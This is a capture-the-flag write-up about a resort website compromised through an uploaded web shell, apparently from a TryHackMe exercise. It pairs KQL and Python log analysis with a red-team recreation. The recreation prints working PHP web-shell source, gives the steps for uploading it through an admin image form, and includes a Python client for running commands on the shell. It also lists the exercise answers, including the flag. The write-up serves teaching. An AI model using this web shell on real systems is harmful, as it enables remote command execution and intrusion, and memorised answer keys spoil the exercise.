Day 3

Even if I wanted to go, their vulnerabilities wouldn't allow it.

The target is a resort’s website, where an attacker uploaded a malicious web shell and exploited it. Our mission is twofold:

  1. Use log analysis with KQL (Kibana Query Language) to investigate the attack.

  2. Recreate the attack to retrieve the stolen flag.txt.

We start by analyzing logs from the frostypines-resorts dataset using KQL in Kibana. The timeframe is set from Oct 3, 2024, 11:30:00 to Oct 3, 2024, 12:00:00.

We also filter the logs for shell.php, which was the file uploaded by the attacker.

We see that the file was uploaded to the path /media/images/rooms/shell.php and was accessed by 10.11.83.34.
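The same triage can be scripted outside Kibana. The following Python example is added here and is not part of the original write-up or of the frostypines-resorts dataset: it parses a handful of constructed access-log lines in the common combined format, restricts them to the Oct 3, 2024 11:30:00 to 12:00:00 window, filters on the file name shell.php the way the KQL query does, and reports the upload path, the client IPs that touched it and any commands passed in the query string. The log lines, the second client IP 10.9.1.7 and the /admin/rooms/create endpoint are assumptions made up for the sample; only the attacker IP and the shell path come from the page.

```python
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines (combined log format). Not the real dataset: only
# 10.11.83.34 and /media/images/rooms/shell.php are taken from the write-up;
# timestamps, the upload endpoint and the 10.9.1.7 client are made up.
SAMPLE_LOG = """\
10.11.83.34 - - [03/Oct/2024:11:34:02 +0000] "GET /admin HTTP/1.1" 200 2451 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:35:10 +0000] "POST /admin/rooms/create HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:36:00 +0000] "GET /media/images/rooms/shell.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:36:21 +0000] "GET /media/images/rooms/shell.php?command=id HTTP/1.1" 200 389 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:37:05 +0000] "GET /media/images/rooms/shell.php?command=ls%20-la HTTP/1.1" 200 402 "-" "Mozilla/5.0"
10.9.1.7 - - [03/Oct/2024:11:40:15 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
10.9.1.7 - - [03/Oct/2024:12:05:44 +0000] "GET /media/images/rooms/shell.php HTTP/1.1" 200 311 "-" "Mozilla/5.0"
"""

# client ip, timestamp, request line, status and size of a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# The window used in Kibana for the investigation
WINDOW_START = datetime(2024, 10, 3, 11, 30, 0, tzinfo=timezone.utc)
WINDOW_END = datetime(2024, 10, 3, 12, 0, 0, tzinfo=timezone.utc)


def parse_line(line):
    """Return a dict for one log line, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl URL-decodes, so "ls%20-la" comes back as "ls -la"
    rec["query"] = dict(parse_qsl(parts.query))
    return rec


def investigate(log_text, needle="shell.php", start=WINDOW_START, end=WINDOW_END):
    """Mirror the KQL workflow: time window first, then file-name filter, then
    pull out where the file lives, who requested it and what they ran."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not (start <= rec["ts"] <= end):
            continue
        if needle not in rec["path"]:
            continue
        hits.append(rec)
    return {
        "paths": sorted({h["path"] for h in hits}),
        "ips": sorted({h["ip"] for h in hits}),
        "commands": [h["query"]["command"] for h in hits if "command" in h["query"]],
        "first_seen": min((h["ts"] for h in hits), default=None),
        "hits": hits,
    }


if __name__ == "__main__":
    result = investigate(SAMPLE_LOG)
    print("web shell path(s):", result["paths"])
    print("client IP(s):     ", result["ips"])
    print("first access:     ", result["first_seen"])
    print("commands run:     ", result["commands"])
```

Note that the 12:05:44 request from 10.9.1.7 is dropped by the time window, which is why the window matters: widen it and a second IP appears in the answer.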

Recreating the attack:

To do this, we can head to http://frostypines.thm.

Before proceeding, add the target machine's IP address and the domain frostypines.thm to your /etc/hosts file on Linux.

By navigating to /admin, we gain access to an admin panel that includes a room creation feature with an image upload option.

Here, we can upload a PHP web shell (shell.php) as the room's image:

<html>
<body>
<!-- The form submits back to this same file via GET, so the command travels in the query string -->
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    // Run whatever arrived in ?command= and print it; 2>&1 folds stderr into the output
    if(isset($_GET['command']))
    {
        system($_GET['command'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

When accessed, the above script displays an input field. Whatever is entered in it is passed straight to the underlying operating system through PHP's system() function, and the output is displayed back to the user.

Once the file is uploaded, it can be accessed at the following URL:

http://frostypines.thm/media/images/rooms/shell.php

On accessing the page, we see an input field and an Execute button.

Try executing Linux commands and retrieve the flag!
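Driving the shell by hand works, but it is often handier to script it. The following Python client is an added example, not part of the original write-up or of the room: it builds the request the way the browser form does (the command goes in the command query parameter, URL-encoded) and pulls the output back out of the <pre> block the shell prints. run_command() needs the live target, so the test exercises only the URL builder and the response parser against a constructed response; the id output shown in that sample is an assumption.

```python
import re
from urllib.parse import urlencode
from urllib.request import urlopen

# Where the uploaded shell ends up, per the write-up
SHELL_URL = "http://frostypines.thm/media/images/rooms/shell.php"

# Constructed response, modelled on the shell's HTML; the id output is made up
SAMPLE_RESPONSE = """<html>
<body>
<form method="GET" name="shell.php">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre>
</body>
</html>"""

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def build_command_url(command, shell_url=SHELL_URL):
    """The shell reads $_GET['command'], so the command only needs to be
    URL-encoded into the query string (spaces become '+', '/' is kept)."""
    return f"{shell_url}?{urlencode({'command': command})}"


def extract_output(html):
    """Return the text between <pre> and </pre>. The shell writes system()
    output raw (no HTML escaping), so no entity decoding is applied."""
    m = PRE_RE.search(html)
    if not m:
        raise ValueError("no <pre> block in response; is this the web shell?")
    return m.group(1).strip()


def run_command(command, shell_url=SHELL_URL, timeout=10):
    """Send one command to the live shell and return its output (needs the target)."""
    with urlopen(build_command_url(command, shell_url), timeout=timeout) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # Offline demonstration against the constructed response
    print(build_command_url("id"))
    print(extract_output(SAMPLE_RESPONSE))
    # Against the live box, for example:
    # print(run_command("find / -name flag.txt 2>/dev/null"))
    # print(run_command("cat /path/from/find/flag.txt"))
```

Because the shell appends 2>&1 itself, errors such as "No such file or directory" come back in the same <pre> block, which makes a find for flag.txt followed by a cat a two-call job.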

Questions

1. BLUE: Where was the web shell uploaded to?

Answer: /media/images/rooms/shell.php

2. BLUE: What IP address accessed the web shell?

Answer: 10.11.83.34

3. RED: What are the contents of flag.txt?

Answer: THM{Gl1tch_Was_H3r3}

Thank you!
